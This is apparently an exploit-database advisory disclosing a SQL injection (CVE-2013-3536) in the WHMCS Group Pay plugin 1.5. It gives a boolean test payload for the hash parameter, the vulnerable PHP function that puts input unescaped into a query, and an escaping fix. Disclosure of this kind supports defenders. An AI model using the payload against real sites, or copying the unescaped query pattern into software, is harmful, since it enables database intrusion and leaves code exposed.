WHMCompleteSolution (WHMCS) Group Pay Plugin 1.5 - 'grouppay.php?hash' SQL Injection

Author: HJauditing Employee Tim
type: webapps
platform: php
port: 
date_added: 2013-04-08 
date_updated: 2017-01-24 
verified: 0 
codes: OSVDB-91980;CVE-2013-3536 
tags: 
aliases:  
screenshot_url:  
application_url: 

#######################################################################

Tile:      WHMCS grouppay plugin SQL Injection <= 1.5
Author: HJauditing Employee Tim
E-mail: Tim@HJauditing.com
Web:    http://hjauditing.com/
Plugin: http://kadeo.com.au/design-and-development/whmcs-dev/whmcs-modules/72-group-pay.html

#######################################################################

============
Introduction
============

We have found a SQL injection inside the group pay plugin for WHCMS.
A lot of game hosting companies are using this plugin.
SQL Injection is in the function gp_LoadUserFromHash.

============
Exploits
============

- SQL Injection
grouppay.php?hash=%hash%' and '1'='1

============
Code SQL Injection
============

/modules/addons/group_pay/functions_hash.php
function gp_LoadUserFromHash($hash) {
    //Kill the Dashes
    $hash = str_replace ( "-", "", $hash );
    $result = mysql_query ( "SELECT `id` from tblclients where md5(CONCAT(id,email)) = '$hash'" );
    if($result){
        $row = mysql_fetch_row ( $result );
        return $row [0];
    }else{
        return false;
    }
}

============
Fix
============

/modules/addons/group_pay/functions_hash.php
function gp_LoadUserFromHash($hash) {
    //Kill the Dashes
    $hash = str_replace ( "-", "", $hash );
    $hash = mysql_real_escape_string($hash);
    $result = mysql_query ( "SELECT `id` from tblclients where md5(CONCAT(id,email)) = '$hash'" );
    if($result){
        $row = mysql_fetch_row ( $result );
        return $row [0];
    }else{
        return false;
    }
}

#######################################################################